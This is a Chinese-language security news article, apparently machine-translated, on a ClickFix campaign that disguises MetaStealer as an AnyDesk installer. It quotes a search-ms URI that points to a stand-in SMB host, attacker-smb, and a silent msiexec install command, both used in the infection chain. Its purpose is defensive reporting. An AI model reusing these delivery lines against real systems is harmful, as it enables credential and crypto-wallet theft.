最近出现了 ClickFix 攻击的一种新变体,伪装成合法的 AnyDesk 安装程序来传播 MetaStealer 信息窃取程序。
该活动利用虚假的 Cloudflare Turnstile 验证页面来引诱受害者执行精心设计的 Windows 协议处理程序,最终提供伪装成 PDF 的恶意 MSI 包。
随着组织继续加强对传统社会工程技术的防御,威胁行为者正在改进他们的剧本,将熟悉的诱饵与意想不到的系统组件混合在一起,以绕过检测并窃取敏感凭据。
单击后,受害者不会像经典 ClickFix 攻击那样将命令粘贴到“运行”对话框中,而是通过 search-ms URI 处理程序重定向到 Windows 文件资源管理器中。
Huntress 研究人员指出,重定向机制的这种微妙转变利用了监控较少的 Windows 搜索协议,让安全团队措手不及。
当 search-ms URI 调用远程 SMB 共享时,感染链就会展开,将名为“自述文件Anydesk.pdf.lnk”的 Windows 快捷方式文件传送到受害者的系统。
与依赖剪贴板粘贴的 PowerShell 命令的 FileFix 变体不同,此攻击会自动启动 LNK 有效负载,LNK 有效负载又执行脚本来下载和安装两个组件:托管在 Microsoft Edge 上的正版 AnyDesk 安装程序以实现合理性,以及从 chat1[.]商店。
诱饵文件实际上是一个 MSI 包,它利用 %COMPUTERNAME% 环境变量将受害者的主机名动态合并到其下载 URL 中。下载后,MSI 将通过以下方式安装:-
msiexec /i "%TEMP%\%%COMPUTERNAME%%.msi" /quiet此命令完成后,元数据会显示两个主要工件:负责编排设置的 CustomActionDLL 和包含ls26.exe、MetaStealer 植入器和清理脚本的 CAB 存档。
Huntress 分析师发现,ls26.exe受到 Private EXE Protector 的保护,并表现出 MetaStealer 的特征行为,包括从浏览器收集凭据和加密钱包盗窃。
感染机制
该活动的核心在于 Windows 搜索的巧妙使用。通过调用 search-ms URI 协议,攻击者绕过强化环境中的“运行”对话框限制,并直接通过文件资源管理器引入有效负载。
以下 URI 代码片段说明了重定向:-
search-ms:displayname=AnyDesk%20Secure%20Access;crumb=location:\\attacker-smb\share用户确认文件资源管理器提示后,LNK 文件将以静默方式执行下载例程。然后,MSI 的 CustomActionDLL 触发 Binary.bz.WrappedSetupProgram 的检索,从而解压缩 ls26.exe 并1.js。
JavaScript 文件确保删除中间文件,而 ls26.exe 启动数据泄露阶段。
通过滥用合法的 Windows 协议和文件处理,这种攻击可以逃避沙箱检测和安全警报,直到最终有效负载释放其恶意逻辑。
这种新兴策略强调了监控可信系统功能的非常规扩展的重要性。
防御者应考虑实施严格的协议处理程序策略、SMB 审核和 MSI 安装的上下文分析,以检测和破坏这些复杂的社会工程活动。
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
